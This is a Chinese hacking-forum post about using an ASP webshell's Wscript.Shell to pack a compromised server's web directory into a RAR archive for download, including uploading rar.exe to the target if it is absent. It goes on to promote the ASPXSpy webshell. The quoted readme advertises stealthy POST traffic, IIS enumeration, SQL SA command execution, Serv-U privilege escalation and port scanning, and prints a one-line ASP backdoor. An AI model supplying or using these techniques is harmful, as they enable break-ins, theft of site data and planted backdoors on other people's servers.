前言:一个很老的话题了,最近好多朋友找我帮忙搞代码,n多关于打包的问题,写篇文章出来,不是新的技术
,只是为了让大家能学到些基本知识,大牛们不要见笑。
〖Wscript.Shell〗
Wscript.Shell方法
[rar.exe路径 a 生成包路径 要打包的目录]
若对方安装了winrar并是默认安装的话 这样命令打包
C:\Program Files\WinRAR\Rar.exe a D:\03389.com\www\YinMu.rar D:\03389.com\www
若对方没有安装winrar就传上去一个你的winrar给他,打包方法不变
如我传了一个rar.exe在d盘那么打包命令就变成了
d:\rar.exe a D:\03389.com\www\YinMu.rar D:\03389.com\www
最后再解释一下以上打包的命令执行的结果
运行rar打包 将 D:\03389.com\www 目录中所有文件打包至D:\03389.com\www\ 文件名为YinMu.rar
有时候用ASP马没权限读某些文件和执行WS,可以尝试下用.NET马,是USER权限,一般都可以搞定。这里推荐下Bin大牛的 ASPXSpy 1.0
空闲的时间写的东西,先发布个测试版本,有很多功能还没有添加进去,有时间再说吧!提前祝大家新年快乐!呵呵!  Readme: 1.开发环境VS2005 + C#,兼容FrameWork1.1/2.0,基本实现代码分离。 2.密码为32位MD5加密(小写) 默认为 admin. 3.采用POST方式提交数据,增强了隐蔽性。 4.添加了IIS探测功能,遍历IIS站点信息。 5.增强了对文件属性的修改。 6.在SQLTools中增加了,SA权限执行系统命令功能,SQL_DIR 功能,可以直接备份log/database,到指定目录。 文件名为bin.asp Shell 为<%execute request("B")%> 7.增加了 Serv-u 提权功能. 8.可以对端口实现单线程扫描。 9.可以对注册表进行简单的读取. PS: 先发布一个测试版本,有几个功能没有加上,有兴趣的朋友可以测试下,估计很快就会被K,发现BUG可以到www.rootkit.net.cn反馈. E-mail : master@rootkit.net.net 感谢 Snailsor 的技术支持,还有Fuyu对我的关怀!祝大家新年快乐! 2008年3月4日更新: 感谢bloodsword修正的登入验证,还有读取注册表的两处BUG。下载已经更新!  点击下载此文件大家可以在自己机器上测试一下再到服务器上打。
真诚欢迎大家和我探讨技术,多交流才能迅速进步。
樱木花盗
QQ:66565841
http://www.03389.com | 